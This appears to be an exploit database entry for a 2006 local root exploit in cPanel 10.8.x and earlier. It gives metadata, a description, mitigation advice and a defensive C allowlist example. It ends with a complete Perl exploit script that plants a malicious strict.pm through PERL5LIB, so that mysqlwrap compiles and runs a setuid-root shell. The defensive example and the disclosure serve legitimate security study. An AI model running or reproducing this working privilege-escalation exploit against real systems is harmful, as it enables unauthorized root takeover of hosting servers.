Vendor: cPanel
By: milw0rm.com
CVSS: 7.2 (HIGH)
Type: Privilege Escalation
CWE: 264
Product Name: cPanel
Affected Version From: cPanel <= 10.8.x
Affected Version To: cPanel <= 10.8.x
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Linux
Year: 2006

cPanel <= 10.8.x cpwrap root exploit via mysqladmin

This exploit gains root access on cPanel <= 10.8.x systems. It writes a malicious strict.pm into the current directory, sets PERL5LIB to that directory, and runs the mysqlwrap binary (after checking that cpwrap is unpatched). The strict.pm is then loaded with root privileges and compiles a setuid root binary, which is executed to gain root access.

Mitigation:

Upgrade to the latest version of cPanel, or apply the patch provided by the vendor.
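
The underlying weakness is that a caller-controlled PERL5LIB reaches Perl code running as root. As an added example (not cPanel's patch and not code from this page), a privileged wrapper can build its environment from an allowlist before calling execve(); the names PASS_THROUGH, SAFE_PATH, build_clean_env and env_lookup are hypothetical.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
/* Hypothetical allowlist: only these names are copied from the caller. */
static const char *const PASS_THROUGH[] = { "LANG", "TZ", NULL };
static const char SAFE_PATH[] = "PATH=/usr/bin:/bin";

/* Return 1 if entry "NAME=value" has a name that is on the allowlist. */
static int is_allowed(const char *entry) {
    const char *eq = strchr(entry, '=');
    if (eq == NULL || eq == entry) return 0;      /* malformed entry */
    size_t n = (size_t)(eq - entry);
    for (size_t i = 0; PASS_THROUGH[i] != NULL; i++)
        if (strlen(PASS_THROUGH[i]) == n && strncmp(entry, PASS_THROUGH[i], n) == 0)
            return 1;
    return 0;
}

/* Build a fresh NULL-terminated environment; caller frees the array only. */
char **build_clean_env(char *const untrusted[]) {
    size_t count = 0;
    while (untrusted[count] != NULL) count++;
    char **clean = calloc(count + 2, sizeof *clean);
    if (clean == NULL) return NULL;
    size_t out = 0;
    clean[out++] = (char *)SAFE_PATH;             /* never inherit PATH */
    for (size_t i = 0; i < count; i++)
        if (is_allowed(untrusted[i])) clean[out++] = untrusted[i];
    clean[out] = NULL;
    return clean;
}

/* Look up NAME in an environment array; NULL if absent. */
const char *env_lookup(char *const env[], const char *name) {
    size_t n = strlen(name);
    for (size_t i = 0; env[i] != NULL; i++)
        if (strncmp(env[i], name, n) == 0 && env[i][n] == '=') return env[i] + n + 1;
    return NULL;
}

int main(void) {
    /* Constructed sample input; a real wrapper would pass env to execve(). */
    char *in[] = { "PERL5LIB=/home/user", "PATH=.", "LANG=C", "PERL5OPT=-w", NULL };
    char **env = build_clean_env(in);
    if (env == NULL) return 1;
    for (size_t i = 0; env[i] != NULL; i++) puts(env[i]);
    free(env);
    return 0;
}
```

An allowlist is used rather than a denylist so that library-path variables other than PERL5LIB are dropped without having to be enumerated.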

Exploit-DB raw data:

#!/usr/bin/perl -w

# 10/01/06 - cPanel <= 10.8.x cpwrap root exploit via mysqladmin
# use strict; # haha oh wait..

my $cpwrap       = "/usr/local/cpanel/bin/cpwrap";
my $mysqlwrap    = "/usr/local/cpanel/bin/mysqlwrap";
my $pwd          = `pwd`;

chomp $pwd;
$ENV{'PERL5LIB'} = "$pwd";

if ( ! -x "/usr/bin/gcc" )  { die "gcc: $!\n"; }
if ( ! -x "$cpwrap" )       { die "$cpwrap: $!\n"; }
if ( ! -x "$mysqlwrap" )    { die "$mysqlwrap: $!\n"; }

open  (CPWRAP, "<$cpwrap") or die "Could not open $cpwrap: $!\n";
while(<CPWRAP>) {
   if(/REMOTE_USER/) { die "$cpwrap is patched.\n"; }
}
close (CPWRAP);

open  (STRICT, ">strict.pm") or die "Can't open strict.pm: $!\n";
print  STRICT  "\$e  = \"int main(){setreuid(0,0);setregid(0,0);system(\\\\\\\"/bin/bash\\\\\\\");}\";\n";
print  STRICT  "system(\"/bin/echo -n \\\"\$e\\\">Maildir.c\");\n";
print  STRICT  "system(\"/usr/bin/gcc Maildir.c -o Maildir\");\n";
print  STRICT  "system(\"/bin/chmod 4755 Maildir\");\n";
print  STRICT  "system(\"/bin/rm -f Maildir.c strict.pm\");\n";
close (STRICT);

system("$mysqlwrap DUMPMYSQL 2>/dev/null");

if ( -e "Maildir" ) {
   system("./Maildir");
}
else {
   unlink "strict.pm";
   die "Failed\n";
}

# milw0rm.com [2006-10-01]